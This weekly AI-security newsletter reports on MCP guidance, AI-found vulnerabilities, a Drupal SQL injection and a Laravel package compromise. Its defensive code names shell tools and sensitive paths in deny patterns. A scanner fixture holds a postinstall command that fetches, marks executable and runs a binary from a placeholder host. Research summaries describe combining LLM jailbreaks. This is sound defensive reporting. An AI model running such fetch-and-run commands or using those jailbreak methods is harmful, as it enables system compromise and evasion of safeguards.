Last Week in AI Security — Week of May 18, 2026

NSA releases Model Context Protocol security guidance; Anthropic's Project Glasswing finds 10,000+ critical vulnerabilities; Drupal SQL injection actively exploited; Laravel package compromise hits thousands.

Key Highlights

  • NSA AISC releases security guidance for AI-driven automation using Model Context Protocol
  • Anthropic's Project Glasswing discovers over 10,000 critical vulnerabilities in systemically important software
  • Drupal Core CVE-2026-9082 SQL injection under active exploitation within 48 hours of patch
  • Laravel Lang organization compromise affects 700+ package versions via supply chain attack
  • Verizon DBIR: vulnerability exploitation surpasses credentials as top breach vector at 31%

Executive Summary

The week of May 18, 2026, demonstrates the double-edged nature of AI in cybersecurity: while AI-powered tools are discovering vulnerabilities at unprecedented scale, they are also collapsing the window defenders have to respond. Verizon’s 2026 Data Breach Investigations Report reveals that exploiting vulnerabilities now triggers 31% of all breaches, surpassing stolen credentials for the first time in the report’s history, as AI has compressed the gap between disclosure and exploitation from months down to hours.

On May 20, the NSA’s Artificial Intelligence Security Center released new guidance on securing AI-driven automation leveraging the Model Context Protocol (MCP), addressing critical architecture risks in agentic AI systems. The timing is significant: Anthropic disclosed on May 23 that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most “systemically” important software since the initiative launched last month. This defensive achievement contrasts sharply with the offensive reality reported by security researchers scanning exposed AI infrastructure, who found that authentication is simply not enabled by default in many ML projects, leaving real user data and company tooling exposed to anyone who looked.

The Drupal Core SQL injection vulnerability CVE-2026-9082 (CVSS 6.5) came under active exploitation less than two days after patches were released on May 22, with CISA adding it to the Known Exploited Vulnerabilities catalog. Meanwhile, a supply chain compromise of the Laravel Lang organization resulted in over 700 malicious package versions being published in rapid succession on May 22 and 23, with tags appearing only seconds apart, indicating automated mass tagging or republishing. Organizations must recognize that the patch-to-exploit timeline has fundamentally changed, and traditional vulnerability management cadences are no longer sufficient in an AI-accelerated threat landscape.

Top Stories

NSA Releases Security Design Considerations for Model Context Protocol

On May 20, 2026, the National Security Agency’s Artificial Intelligence Security Center (AISC) released a Cybersecurity Information Sheet (CSI) titled “Model Context Protocol (MCP): Security Design Considerations.” The guidance addresses growing concerns about the security architecture of AI agent systems that use Anthropic’s Model Context Protocol, a framework increasingly adopted for connecting LLMs to external tools, data sources, and APIs.

The timing of the NSA guidance coincides with heightened scrutiny of agentic AI security. The Model Context Protocol enables LLMs to interact with file systems, databases, APIs, and code execution environments, capabilities that dramatically expand the attack surface when security controls are inadequate. Previous vulnerabilities in MCP implementations (CVE-2025-49596, CVE-2026-22252) have highlighted execution risks. Anthropic has characterized the behavior as “expected” rather than changing the protocol’s architecture, so developers who inherit Anthropic’s MCP reference implementation continue to face those execution risks even where individual vendors patch their own implementations.

The NSA guidance is expected to provide architectural security controls for MCP server deployments, focusing on isolation, access control, input validation, and monitoring. Recommended mitigations include blocking public IP access to sensitive services running MCP, monitoring MCP tool invocations for unusual activity, running MCP-enabled services within a sandbox environment, treating all external MCP configuration input as untrusted data, and only installing MCP servers from verified sources to mitigate supply-chain risks.

Organizations deploying agentic AI systems should treat the NSA guidance as a baseline security requirement, recognizing that AI agents with tool access represent a fundamentally different threat model than traditional LLM applications.
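As an added illustration of the mitigations listed above (not code from the NSA guidance or from any MCP implementation), the Python sketch below treats an external MCP server configuration as untrusted input, accepts only servers on a verified list that bind to loopback, and gates every tool invocation against a tool allowlist, argument deny patterns and a burst threshold while keeping an audit trail. The server name, tool names, digest value and thresholds are assumptions.

```python
import json
import re
from collections import defaultdict, deque

# Constructed allowlist of verified MCP servers: name -> expected artifact digest.
# The digest is a placeholder; a real deployment pins the digest of the reviewed
# server package it actually installs.
VERIFIED_SERVERS = {"files-readonly": "sha256:PLACEHOLDER_DIGEST"}
# Tools each verified server may expose to the agent (assumed names).
TOOL_ALLOWLIST = {"files-readonly": {"read_file", "list_dir"}}
# Argument patterns that should never reach a tool from a model-driven call.
DENY_ARG_PATTERNS = [
    re.compile(r"(^|/)\.\.(/|$)"),                    # path traversal
    re.compile(r"^/(etc|proc|root)(/|$)"),            # sensitive host paths
    re.compile(r"(^|[\s;|&])(curl|wget|sh|bash)\b"),  # shell-style payloads
]
BURST_CALLS = 5         # more than this many calls to one tool ...
BURST_WINDOW_SEC = 1.0  # ... inside this window is flagged as unusual


def validate_server_config(raw_json: str) -> dict:
    """Treat externally supplied MCP configuration as untrusted.

    Parses the JSON, checks its shape, and refuses any server that is not on the
    verified list, whose digest does not match, or that would bind a non-loopback
    address (public IP access to MCP services is one of the listed risks)."""
    cfg = json.loads(raw_json)
    servers = cfg.get("mcpServers") if isinstance(cfg, dict) else None
    if not isinstance(servers, dict):
        raise ValueError("mcpServers must be an object")
    accepted = {}
    for name, spec in servers.items():
        if name not in VERIFIED_SERVERS:
            raise ValueError(f"unverified MCP server: {name}")
        if not isinstance(spec, dict) or spec.get("digest") != VERIFIED_SERVERS[name]:
            raise ValueError(f"digest mismatch for {name}")
        if spec.get("bind", "127.0.0.1") != "127.0.0.1":
            raise ValueError(f"{name} must not listen on a public interface")
        accepted[name] = spec
    return accepted


def config_is_rejected(raw_json: str) -> bool:
    """True when validate_server_config refuses the configuration."""
    try:
        validate_server_config(raw_json)
    except ValueError:
        return True
    return False


class ToolCallGate:
    """Decides whether an agent's tool invocation may proceed and records why not."""

    def __init__(self):
        self.recent = defaultdict(lambda: deque(maxlen=BURST_CALLS))
        self.audit_log = []

    def check(self, server: str, tool: str, args: dict, ts: float):
        reasons = []
        if tool not in TOOL_ALLOWLIST.get(server, set()):
            reasons.append("tool not in allowlist")
        for value in args.values():
            if any(p.search(str(value)) for p in DENY_ARG_PATTERNS):
                reasons.append(f"denied argument pattern: {value!r}")
                break
        history = self.recent[(server, tool)]
        # Deque is full only once BURST_CALLS calls were seen; history[0] is the oldest.
        if len(history) == BURST_CALLS and ts - history[0] < BURST_WINDOW_SEC:
            reasons.append("burst of calls to one tool")
        history.append(ts)
        decision = "deny" if reasons else "allow"
        self.audit_log.append({"ts": ts, "server": server, "tool": tool,
                               "args": args, "decision": decision, "reasons": reasons})
        return decision, reasons
```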

Anthropic’s Project Glasswing Discovers 10,000+ Critical Vulnerabilities in Global Software Infrastructure

Anthropic disclosed on Friday, May 23, that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most “systemically” important software worldwide since the cybersecurity initiative went live last month. Project Glasswing represents Anthropic’s defensive effort to use its Claude Mythos Preview model—which has generated significant concern due to its offensive cyber capabilities—to systematically audit critical open-source and enterprise software.

The scale of the vulnerability discovery is unprecedented. While Google’s Threat Intelligence Group reported in the previous week that the first AI-assisted zero-day had been discovered and exploited by criminals, Anthropic’s announcement demonstrates the defensive potential of the same technology. The Glasswing initiative operates as a closed program, providing access to Claude Mythos Preview strictly for defensive work by a select group of organizations including Verizon and government agencies.

Mythos, announced on April 7, runs inside Anthropic’s “Project Glasswing,” with specialists saying its high-level coding ability gives it a possibly unmatched knack for spotting vulnerabilities and working out how to exploit them. The model’s capability has prompted government officials’ attention, with Anthropic CEO Dario Amodei meeting with senior members of the Trump administration to discuss Mythos at the White House just days after it was announced.

The disclosure raises important questions about responsible AI deployment. While Anthropic has limited Mythos distribution to vetted defensive users, the technology’s existence confirms that AI models can now autonomously discover vulnerabilities at a scale and speed that human security researchers cannot match. Organizations should expect that adversaries will soon have access to similar capabilities, whether through alternative models or through compromise of defensive AI systems.

Massive Laravel Package Supply Chain Compromise Hits PHP Ecosystem

Socket security researchers discovered that the Laravel Lang organization’s release process was compromised, resulting in over 700 malicious versions being published across multiple packages on May 22 and May 23, 2026. Many versions appeared only seconds apart, which suggests automated mass tagging or republishing and indicates that the attackers may have obtained organization-level credentials, repository automation, or release-infrastructure access.

The compromised packages include laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, all widely used in the PHP and Laravel development ecosystem. The attack’s “cross-ecosystem placement” makes it stand out: developers and security teams scanning PHP dependencies may focus only on Composer-related metadata and skip the package.json lifecycle hooks bundled inside the package. Analysis found that the upstream repositories had been modified to include a postinstall script that attempts to download a Linux binary from a GitHub Releases URL; the malicious versions have since been removed from Packagist.

This supply chain attack demonstrates several concerning trends: the use of legitimate package publishing infrastructure to distribute malware, the exploitation of multi-language toolchain dependencies (PHP packages containing Node.js hooks), and the rapid, automated nature of the compromise. Organizations using affected packages should immediately audit their dependencies, rotate any credentials that may have been exposed, and verify the integrity of their build environments.
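An added example, not Socket’s scanner and not code from the laravel-lang project: a small Python audit that walks a Composer vendor/ tree, reports every package.json lifecycle hook bundled inside a PHP package, and flags hooks that fetch and run a remote binary, the cross-ecosystem pattern described above. The package names, hook command, org/repo names and heuristics are constructed placeholders.

```python
import json
import os
import re
import tempfile

# npm lifecycle hooks that run automatically on install, with no user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "postuninstall")
# Constructed heuristics for download-and-execute behaviour (not Socket's rules).
SUSPICIOUS = {
    "remote-fetch": re.compile(r"\b(curl|wget)\b"),
    "github-release-download": re.compile(
        r"https?://github\.com/[^/\s]+/[^/\s]+/releases/download/"),
    "make-executable": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "pipe-to-shell": re.compile(r"\|\s*(sh|bash)\b"),
    "inline-eval": re.compile(r"\b(node|python3?)\s+-[ec]\b"),
}


def scan_package_json(path: str) -> list:
    """Return every lifecycle hook in one package.json with the heuristics it trips."""
    with open(path, encoding="utf-8") as fh:
        manifest = json.load(fh)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue
        hits = [label for label, pattern in SUSPICIOUS.items() if pattern.search(command)]
        findings.append({"hook": hook, "command": command, "suspicious": hits})
    return findings


def scan_vendor_tree(vendor_dir: str) -> list:
    """Walk a Composer vendor/ tree and report package.json lifecycle hooks per package.

    Every hook is reported because it runs silently on npm install; hooks with a
    non-empty 'suspicious' list deserve immediate review."""
    report = []
    for root, _dirs, files in os.walk(vendor_dir):
        if "package.json" not in files:
            continue
        package = os.path.relpath(root, vendor_dir).replace(os.sep, "/")
        for finding in scan_package_json(os.path.join(root, "package.json")):
            finding["package"] = package
            report.append(finding)
    return sorted(report, key=lambda f: f["package"])


def build_sample_vendor() -> str:
    """Constructed fixture: one benign package and one mimicking the tampered pattern
    (a postinstall hook fetching a binary from a GitHub Releases URL). Placeholders only."""
    base = tempfile.mkdtemp(prefix="vendor-sample-")
    manifests = {
        "example-vendor/clean-package": {
            "name": "clean-package",
            "scripts": {"build": "vite build", "test": "vitest run"}},
        "example-vendor/tampered-package": {
            "name": "tampered-package",
            "scripts": {"postinstall": (
                "curl -fsSL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/"
                "v1/tool-linux -o /tmp/tool && chmod +x /tmp/tool && /tmp/tool")}},
    }
    for rel, manifest in manifests.items():
        pkg_dir = os.path.join(base, rel)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return base


if __name__ == "__main__":
    for finding in scan_vendor_tree(build_sample_vendor()):
        print(finding["package"], finding["hook"], finding["suspicious"] or "no heuristic hit")
```

Point scan_vendor_tree at a real vendor/ directory to audit an installed Laravel project; a clean tree yields an empty report.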

The Laravel incident follows a pattern of increasingly sophisticated supply chain attacks targeting developer toolchains. Last month saw the LiteLLM compromise, and this week’s attack shows that adversaries are systematically targeting the trust relationships embedded in package ecosystems.

Framework & Standards Updates

NIST AI Risk Management Framework Developments

On April 7, 2026, NIST released a concept note for an AI RMF Profile on Trustworthy AI in Critical Infrastructure, which will guide critical infrastructure operators towards specific risk management practices to consider when engaging AI-enabled capabilities. This profile represents NIST’s continued expansion of sector-specific guidance following the July 26, 2024 release of the Generative Artificial Intelligence Profile (NIST AI 600-1), which helps organizations identify unique risks posed by generative AI and proposes actions for risk management.

NIST Cyber AI Profile Preliminary Draft

NIST released an initial preliminary draft of the Cybersecurity Framework Profile for Artificial Intelligence (Cyber AI Profile, NIST IR 8596). It is designed as a voluntary framework that extends the recently updated NIST Cybersecurity Framework (CSF) 2.0 to the new cybersecurity risks and opportunities introduced by AI and that complements NIST’s AI Risk Management Framework (AI RMF); NIST envisions the CSF 2.0, the AI RMF, and the Cyber AI Profile being used together.

The preliminary draft is organized around three Focus Areas: Secure (securing AI systems); Defend (conducting AI-enabled cyber defense); and Thwart (thwarting adversarial cyberattacks using AI), with a separate but related release covering “Control Overlays for Securing AI Systems” including “Overview and Methodology” (NIST IR 8605) and “Using and Fine-Tuning Predictive AI” (NIST IR 8605A).

MITRE ATLAS Expansion for Agentic AI

MITRE ATLAS now catalogs 16 tactics, 84 techniques, and 56 sub-techniques specifically targeting AI and machine learning systems, up from 15 tactics and 66 techniques as of October 2025. The November 2025 framework update (v5.1.0) expanded the catalog to 16 tactics, 84 techniques, 32 mitigations, and 42 case studies, and continued updates through February 2026 added agentic AI techniques.

The February 2026 v5.4.0 update added further agent-focused techniques including “Publish Poisoned AI Agent Tool” and “Escape to Host.” These additions reflect the evolving threat landscape as AI agents gain production access to internal systems and external tools.

Vulnerability Watch

Critical and Actively Exploited

CVE-2026-9082: Drupal Core SQL Injection (CVSS 6.5)

CISA added CVE-2026-9082, a SQL injection vulnerability affecting all supported versions of Drupal Core, to the Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation. The vulnerability allows privilege escalation and remote code execution via specially crafted requests to the database abstraction API. News of exploitation arrived less than two days after Drupal released fixes on May 22, 2026.

Affected versions: All supported Drupal versions
Patched versions: Drupal 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, 10.4.10 (manual patching required for 9.5 and 8.9)
Mitigation: Immediate patching is required. Organizations running Drupal should treat this as a patch-or-die scenario given the sub-48-hour time-to-exploit.

Supply Chain Vulnerabilities

Laravel Lang Organization Compromise (May 22-23, 2026)

The Laravel Lang organization’s release process was compromised, resulting in over 700 malicious package versions published across laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, with versions appearing only seconds apart on May 22 and May 23, 2026.

Mitigation: Remove malicious versions, verify package integrity, audit systems that may have installed compromised versions, rotate credentials.

CVE-2025-34291: Langflow Remote Code Execution (CVSS 9.4)

CVE-2025-34291 is an origin validation error vulnerability in Langflow that could allow an attacker to execute arbitrary code and achieve full system compromise. The vulnerability exploits three combined weaknesses: overly permissive CORS, lack of cross-site request forgery (CSRF) protection, and an endpoint that allows code execution.

Affected versions: On-premise Langflow deployments
Mitigation: Apply vendor patches, implement network segmentation, restrict access to Langflow management interfaces.

AI/ML Framework Vulnerabilities

CVE-2026-32207: Microsoft Azure Machine Learning XSS (CVSS High)

CVE-2026-32207 involves improper neutralization of input during web page generation (‘cross-site scripting’) in Azure Machine Learning, allowing an unauthorized attacker to perform spoofing over a network.

The vulnerability presents a high risk for organizations that expose Azure Machine Learning notebooks to untrusted users: exploitation requires user interaction but no privileges. Notebook spoofing via web scripting can let attackers trick users into running actions, leak sensitive notebook or session data, or perform unauthorized workflows through the UI, which in ML environments can quickly translate into data exposure and integrity loss across projects and teams.

Mitigation: Restrict notebook access, implement content security policies, update to patched Azure ML versions.

Industry Radar

OpenAI Launches $4 Billion Deployment Company

OpenAI stood up the OpenAI Deployment Company, backed by more than $4 billion in initial capital, to support organizations in adopting and scaling AI. It acquired the AI consulting firm Tomoro to staff the venture from the start; OpenAI holds a majority ownership and control stake, and the Tomoro deal brings roughly 150 engineers and AI deployment specialists to the organization at launch.

US Government Expands Pre-Deployment AI Model Testing

The Center for AI Standards and Innovation (CAISI) announced agreements with Google DeepMind, Microsoft, and Elon Musk’s xAI that will allow the U.S. government to evaluate artificial intelligence models before they are publicly available. CAISI will conduct “pre-deployment evaluations and targeted research to better assess frontier AI capabilities and advance the state of AI security,” building on its 2024 partnerships with OpenAI and Anthropic.

Trump Delays AI Security Executive Order

On May 21, 2026, President Donald Trump delayed signing an executive order that would allow the government to evaluate AI models before they’re released, saying he was not happy with the language. “I didn’t like certain aspects of it,” Trump told the White House press pool, adding, “We’re leading China, we’re leading everybody, and I don’t want to do anything that’s going to get in the way of that leading.” The unofficial reason reported was that not enough tech CEOs could make it to Washington, D.C. on short notice.

The anticipated executive order would have tasked the Office of the National Cyber Director and other agencies with developing a process to evaluate AI models for security before their release.

Pwn2Own Berlin 2026: 47 Zero-Days Disclosed

The Pwn2Own Berlin 2026 hacking contest concluded with security researchers collecting $1,298,250 in rewards after exploiting 47 zero-day flaws in products from Windows, Linux, VMware, and NVIDIA. DEVCORE won the event with 50.5 Master of Pwn points and $505,000 in rewards over the three-day contest.

Policy Corner

EU AI Act Enforcement Timeline

EU AI Act enforcement begins August 2026, with penalties exceeding GDPR fine levels. The Act’s first binding obligations (prohibitions and general-purpose AI transparency) are already in effect, high-risk AI system obligations enter phased enforcement through 2026, and the NIST AI RMF is widely used as a technical companion framework for AI Act compliance.

US State-Level AI Regulation

Many state-level AI regulations reference NIST standards. Organizations operating in multiple jurisdictions should monitor state-level AI legislation, as requirements are rapidly diverging across states.

China Blocks Meta AI Acquisition

China’s National Development and Reform Commission formally blocked Meta’s $2B acquisition of the Chinese agent startup Manus, ordering both parties to withdraw the transaction—the first state-level prohibition of an inbound AI acquisition by China.

Research Spotlight

Prompt Injection and Jailbreak Attacks in Large Language Model-Based Agents (Rizwan Tanveer, May 9, 2026, SSRN)

This paper synthesizes the prompt-injection and jailbreak literature from 2023 to 2026, examining how the agentic deployment context—integrating retrieval, tool invocation, persistent memory, and the Model Context Protocol—has dramatically expanded the prompt-injection attack surface, and positions prompt injection as a problem requiring defence-in-depth across input, retrieval, planning, tool execution, and output layers, rather than a single-control problem.

Analysis of LLMs Against Prompt Injection and Jailbreak Attacks (arXiv, February 24, 2026)

A key insight emerging from this research is that jailbreak attacks exploit the inherent tension between helpfulness and harmlessness objectives in aligned LLMs, with models prioritizing instruction-following and narrative consistency over strict safety enforcement when presented with sufficiently coherent, contextually rich, or multi-step reasoning prompts.

Adversarial Machine Learning: A 20-Year Survey of Attacks, Defenses, and Standards (April 30, 2026)

This comprehensive survey examines how Adversarial Machine Learning (AML) presents a significant barrier to the large-scale deployment of AI in safety-critical environments, with the field evolving from early algorithmic robustness research to a broader focus on real-world deployment challenges, covering publications from 2002 to March 2026.

Query-efficient decision-based adversarial attack with low query budget (Nature Scientific Reports, February 2, 2026)

This paper presents a novel decision-based attack called the “one plane one query attack” (OPOQA), designed to generate high-quality adversarial examples on a low query budget and addressing the problem that existing decision-based attacks require thousands of queries. The main idea is to generate more candidate examples in each iteration for random exploration of the decision boundary and to select the most suitable adversarial example for the next iteration.

RogueGPT: Unleashing Jailbreak Prompts on LLMs (Shivaswaroopa et al., Engineering Reports, April 2026)

The paper notes that, given the robust security measures implemented by LLM creator organizations, a single jailbreak may not suffice to access illicit data, so a combination of different jailbreak methods is employed to retrieve the required information. It also observes that developing current jailbreak prompts has required substantial research and dedication from numerous researchers and enthusiasts.

What This Means For You

Accelerate your patch cycles immediately. The Verizon DBIR confirms that vulnerability exploitation now accounts for 31% of breaches, surpassing credentials for the first time, with AI compressing the time-to-exploit from months to hours. The Drupal SQL injection CVE-2026-9082 was exploited within 48 hours of patch release. Traditional monthly patching schedules are no longer viable for critical systems. Implement continuous vulnerability monitoring and establish emergency patching procedures for internet-facing systems.

Treat AI agent deployments as high-risk execution environments. The NSA’s MCP security guidance arrives as organizations rush to deploy agentic AI systems. Every AI agent with tool access represents a potential command execution surface. Block public IP access to MCP services, monitor tool invocations for anomalies, and run MCP-enabled services in isolated sandbox environments. Do not treat LLM agents as content generators—they are privileged code execution platforms and should be secured accordingly.

Audit your supply chain with AI-specific scrutiny. The Laravel package compromise demonstrates that attackers are targeting developer toolchains with increasing sophistication. Organizations should implement dependency scanning that catches cross-language attacks (e.g., Node.js hooks in PHP packages), verify package signatures, and use tools like Socket or Snyk to detect malicious behavior in dependencies. Consider establishing an internal package mirror for critical dependencies to provide a buffer against upstream compromises.

Plan for offensive AI capabilities in adversary hands. Anthropic’s Project Glasswing has found 10,000+ vulnerabilities using Claude Mythos. While this technology is currently restricted to defensive use, you should assume that similar offensive capabilities will become available to adversaries within 6-12 months. Conduct threat modeling exercises that assume attackers have AI-assisted vulnerability discovery tools, and prioritize architectural security controls (least privilege, network segmentation, zero trust) over reliance on obscurity or patching speed alone.

Tools and Resources

NIST Cyber AI Profile (Preliminary Draft)
NIST IR 8596 - Preliminary draft extending CSF 2.0 to AI-specific cybersecurity risks, organized around Secure, Defend, and Thwart focus areas.

NSA Model Context Protocol Security Guidance
NSA AISC Cybersecurity Information Sheet - Security design considerations for AI-driven automation using MCP, released May 20, 2026.

MITRE ATLAS v5.4.0
atlas.mitre.org - Updated framework with 16 tactics, 84 techniques, and new agentic AI attack patterns including “Publish Poisoned AI Agent Tool” and “Escape to Host.”

Socket Security Scanner
socket.dev - Enhanced supply chain detection for cross-language attacks and malicious package behavior. Detected the Laravel Lang organization compromise.

DARPA AI Cyber Challenge Tools
Competition finalists have developed AI systems that are transforming vulnerability hunting at far lower cost than proprietary models. DARPA and the winning teams report that they are thrilled with the effectiveness of the new tools at a time when the U.S. cybersecurity workforce is stretched thin and adversaries are using AI to speed up attacks.